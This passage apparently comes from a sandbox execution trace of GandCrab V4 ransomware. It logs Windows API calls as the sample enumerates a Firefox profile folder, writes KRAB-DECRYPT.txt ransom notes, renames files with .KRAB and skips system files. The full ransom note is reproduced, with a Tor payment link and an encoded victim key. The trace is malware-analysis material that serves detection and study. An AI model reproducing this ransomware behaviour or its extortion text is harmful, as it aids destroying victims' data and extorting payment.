KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0080.937] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0080.938] CloseHandle (hObject=0x7ec) returned 1 [0080.938] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.938] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.939] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1c, wMilliseconds=0x8c)) [0080.939] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.939] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.939] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.939] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock") returned 119 [0080.940] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0081.058] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.059] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.059] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\") returned 96 [0081.059] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*" [0081.059] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1023cb8 [0081.059] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.059] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0081.059] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.059] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.059] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0081.059] lstrcmpW (lpString1="1.4.8.903", lpString2=".") returned 1 [0081.060] lstrcmpW (lpString1="1.4.8.903", lpString2="..") returned 1 [0081.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="1.4.8.903" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903" [0081.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\" [0081.060] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0081.060] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0081.060] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0081.060] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0081.060] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0081.060] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.061] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.061] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\\\KRAB-DECRYPT.txt") returned 123 [0081.077] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0081.089] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0081.089] WriteFile (in: hFile=0x720, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0081.090] CloseHandle (hObject=0x720) returned 1 [0081.090] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.091] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.091] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1c, wMilliseconds=0x125)) [0081.091] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.092] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0081.092] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0081.092] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock") returned 129 [0081.092] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x720 [0081.122] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.122] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.122] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\") returned 106 [0081.122] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*" [0081.123] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023578 [0081.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.123] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.123] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.123] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.123] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0081.123] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0081.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock" [0081.123] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.123] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 134 [0081.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a08d2ca4dee3d.lock") returned 129 [0081.124] lstrlenW (lpString=".lock") returned 5 [0081.124] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.124] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0081.124] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.137] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.137] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.137] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0081.138] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0081.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt" [0081.138] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.138] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt.KRAB") returned 127 [0081.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt") returned 122 [0081.138] lstrlenW (lpString=".txt") returned 4 [0081.138] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.138] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0081.138] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt") returned 122 [0081.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\KRAB-DECRYPT.txt") returned 122 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0081.139] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0081.139] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.140] 